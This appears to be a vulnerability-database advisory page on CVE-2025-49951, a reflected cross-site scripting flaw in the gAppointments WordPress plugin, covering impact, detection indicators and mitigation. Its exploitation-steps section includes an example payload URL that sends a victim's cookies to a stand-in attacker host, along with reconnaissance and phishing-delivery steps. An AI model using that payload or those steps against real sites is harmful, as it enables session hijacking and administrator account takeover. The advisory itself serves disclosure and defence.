Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2025-49951
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-49951 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WordPress plugin gAppointments, developed by wpcrunch. It affects all versions of the plugin up to and including 1.14.1, with no official patch available as of the time of disclosure. The vulnerability was reported by researcher 0xd4rk5id3 on June 11, 2025, and published by Patchstack on July 11, 2025; it was assigned a CVE on October 22, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack, NVD).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS variant. User-supplied input is not properly sanitized or encoded before being reflected back in the HTTP response, allowing an attacker to inject arbitrary JavaScript into the page rendered in a victim's browser. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a privileged user must click a crafted malicious link or visit an attacker-controlled page. The vulnerability is network-accessible with low attack complexity (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute malicious scripts in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim (including administrative actions if an admin is targeted), and injection of malicious redirects or advertisements visible to site visitors. The CVSS scope is marked as Changed, indicating that the impact extends beyond the vulnerable component to the user's browser environment (Patchstack, NVD).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, Patchstack notes that XSS vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of site popularity (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the gAppointments plugin version 1.14.1 or earlier using tools like WPScan, Shodan, or Google dorks targeting plugin-specific file paths.
  2. Identify vulnerable parameter: Locate the input parameter(s) within the gAppointments plugin that are reflected unsanitized in the HTTP response (e.g., URL query parameters or form fields processed by the plugin).
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, such as https://target-site.com/?gappointments_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver payload: Send the crafted URL to a target user (e.g., a WordPress administrator) via phishing email, social engineering, or embedding in a malicious page.
  5. Achieve objective: When the victim clicks the link and their browser renders the reflected response, the injected script executes — enabling session cookie theft, credential harvesting, or unauthorized administrative actions on the WordPress site (Patchstack).

Indicators of compromise

  • Network: HTTP requests to WordPress pages with gAppointments plugin parameters containing encoded JavaScript payloads (e.g., <script>, javascript:, onerror=, onload= patterns in URL query strings or POST bodies).
  • Logs: WordPress or web server access logs showing unusual GET/POST requests to gAppointments plugin endpoints with URL-encoded script tags or event handler attributes; referrer headers pointing to external or unknown domains.
  • Logs: Outbound requests from victim browsers to attacker-controlled domains shortly after visiting a gAppointments-related page, potentially visible in proxy or firewall logs.
  • File System: Unexpected modifications to WordPress theme or plugin files if an attacker leveraged XSS to achieve further compromise (e.g., injected backdoors via admin session hijacking).

Mitigation and workarounds

As of the time of disclosure, no official patch from the plugin developer (wpcrunch) is available for gAppointments. Site administrators are advised to deactivate and remove the plugin until an official fix is released. Patchstack has issued a virtual patching/mitigation rule for subscribers that blocks exploitation attempts without requiring a code-level fix. As a general hardening measure, implement a Web Application Firewall (WAF) with XSS filtering rules, and restrict access to WordPress admin areas using IP allowlisting (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-93031HIGH8.8
  • use-your-drive
NoYesSep 18, 2026
CVE-2026-87915HIGH7.2
  • popup-maker
NoYesSep 18, 2026
CVE-2026-18405HIGH7.2
  • jeg-elementor-kit
NoYesSep 18, 2026
CVE-2026-15797MEDIUM6.4
  • popup-maker
NoYesSep 18, 2026
CVE-2026-90884MEDIUM5.4
  • wp-recipe-maker
NoYesSep 18, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management